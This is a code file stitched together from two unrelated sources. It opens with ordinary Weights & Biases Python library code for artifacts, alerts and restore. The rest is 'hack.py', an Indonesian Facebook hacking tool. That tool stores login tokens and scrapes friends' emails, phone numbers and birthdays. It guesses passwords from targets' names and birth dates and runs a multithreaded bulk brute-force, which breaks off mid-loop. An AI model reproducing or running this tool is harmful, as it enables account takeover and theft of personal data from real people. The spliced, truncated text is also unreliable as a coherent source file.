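# Each worker contributes its shard to the same, not-yet-finalized artifact.
run.upsert_artifact("./shard-0", name="big-dataset", type="dataset")
```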
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name=name,
type=type,
aliases=aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Finishes a non-finalized artifact as output of a run.
Subsequent "upserts" with the same distributed ID will result in a new version.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
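Example:
A minimal sketch; assumes earlier workers upserted shards into the same
artifact name under the same group:
```python
import wandb
run = wandb.init(group="dist-ingest")
# Add a final shard and finalize the artifact version.
run.finish_artifact("./final-shard", name="big-dataset", type="dataset")
```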
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
finalize: bool = True,
is_user_created: bool = False,
use_after_commit: bool = False,
) -> wandb_artifacts.Artifact:
api = internal.Api()
if api.settings().get("anonymous") == "true":
wandb.termwarn(
"Artifacts logged anonymously cannot be claimed and expire after 7 days."
)
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
if aliases is not None:
if any(invalid in alias for alias in aliases for invalid in ["/", ":"]):
raise ValueError(
"Aliases must not contain any of the following characters: /, :"
)
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend and self._backend.interface:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
elif self._internal_run_interface:
self._internal_run_interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self) -> PublicApi:
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact) -> None: # type: ignore
if not self._settings._offline:
try:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
except requests.exceptions.RequestException:
# Just return early if there is a network error. This is
# ok, as this function is intended to help catch an invalid
# type early, but not a hard requirement for valid operation.
return
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> Tuple[wandb_artifacts.Artifact, List[str]]:
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title: str,
text: str,
level: Union[str, "AlertLevel"] = None,
wait_duration: Union[int, float, timedelta, None] = None,
) -> None:
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
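Example:
A minimal sketch; the title, text, and threshold are illustrative:
```python
import wandb
run = wandb.init()
accuracy = 0.4
if accuracy < 0.5:
    run.alert(
        title="Low accuracy",
        text=f"Accuracy {accuracy} is below 0.5",
        level=wandb.AlertLevel.WARN,
        wait_duration=300,  # seconds before another alert with this title
    )
```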
"""
level = level or wandb.AlertLevel.INFO
level_str: str = level.value if isinstance(level, wandb.AlertLevel) else level
if level_str not in {lev.value for lev in wandb.AlertLevel}:
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend and self._backend.interface:
self._backend.interface.publish_alert(title, text, level_str, wait_duration)
def __enter__(self) -> "Run":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> bool:
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
def mark_preempting(self) -> None:
"""Marks this run as preempting.
Also tells the internal process to immediately report this to server.
"""
if self._backend and self._backend.interface:
self._backend.interface.publish_preempting()
# We define this outside of the run context to support restoring before init
def restore(
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
"""Downloads the specified file from cloud storage.
File is placed into the current directory or run directory.
By default will only download the file if it doesn't already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
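Example:
A minimal sketch; the file name and run_path are illustrative:
```python
import wandb
weights = wandb.restore("model.h5", run_path="my-entity/my-project/a1b2c3d4")
if weights is not None:
    print(weights.name)  # local path of the downloaded file
```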
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propagate our doc string to the run's restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code: int = None, quiet: bool = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
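Example:
A minimal sketch of multiple runs in one process; the project name is
illustrative:
```python
import wandb
for seed in (0, 1, 2):
    run = wandb.init(project="my-project", reinit=True)
    run.log({"seed": seed})
    run.finish()  # close this run before starting the next one
```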
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code, quiet=quiet)
class _LazyArtifact(ArtifactInterface):
_api: PublicApi
_instance: Optional[ArtifactInterface] = None
_future: Any
def __init__(self, api: PublicApi, future: Any):
self._api = api
self._future = future
def _assert_instance(self) -> ArtifactInterface:
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item: str) -> Any:
self._assert_instance()
return getattr(self._instance, item)
def wait(self) -> ArtifactInterface:
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(
self._instance, ArtifactInterface
), "Insufficient permissions to fetch Artifact with id {} from {}".format(
resp.artifact_id, self._api.client.app_url
)
return self._instance
@property
def id(self) -> Optional[str]:
return self._assert_instance().id
@property
def version(self) -> str:
return self._assert_instance().version
@property
def name(self) -> str:
return self._assert_instance().name
@property
def type(self) -> str:
return self._assert_instance().type
@property
def entity(self) -> str:
return self._assert_instance().entity
@property
def project(self) -> str:
return self._assert_instance().project
@property
def manifest(self) -> "ArtifactManifest":
return self._assert_instance().manifest
@property
def digest(self) -> str:
return self._assert_instance().digest
@property
def state(self) -> str:
return self._assert_instance().state
@property
def size(self) -> int:
return self._assert_instance().size
@property
def commit_hash(self) -> str:
return self._assert_instance().commit_hash
@property
def description(self) -> Optional[str]:
return self._assert_instance().description
@description.setter
def description(self, desc: Optional[str]) -> None:
self._assert_instance().description = desc
@property
def metadata(self) -> dict:
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata: dict) -> None:
self._assert_instance().metadata = metadata
@property
def aliases(self) -> List[str]:
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases: List[str]) -> None:
self._assert_instance().aliases = aliases
def used_by(self) -> List["wandb.apis.public.Run"]:
return self._assert_instance().used_by()
def logged_by(self) -> "wandb.apis.public.Run":
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name: str) -> "ArtifactEntry":
return self._assert_instance().get_path(name)
def get(self, name: str) -> "WBValue":
return self._assert_instance().get(name)
def download(self, root: Optional[str] = None, recursive: bool = False) -> str:
return self._assert_instance().download(root, recursive)
def checkout(self, root: Optional[str] = None) -> str:
return self._assert_instance().checkout(root)
def verify(self, root: Optional[str] = None) -> Any:
return self._assert_instance().verify(root)
def save(self) -> None:
return self._assert_instance().save()
def delete(self) -> None:
return self._assert_instance().delete()
|
hack.py
|
#TKJ Black Hat
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br. xd(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = ' MR SHSUI UCIHA HACK FB'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLogin Akun Facebook Heula \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://youtube.com/NjankSoekamti')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. LogOut '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/nganunymous')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
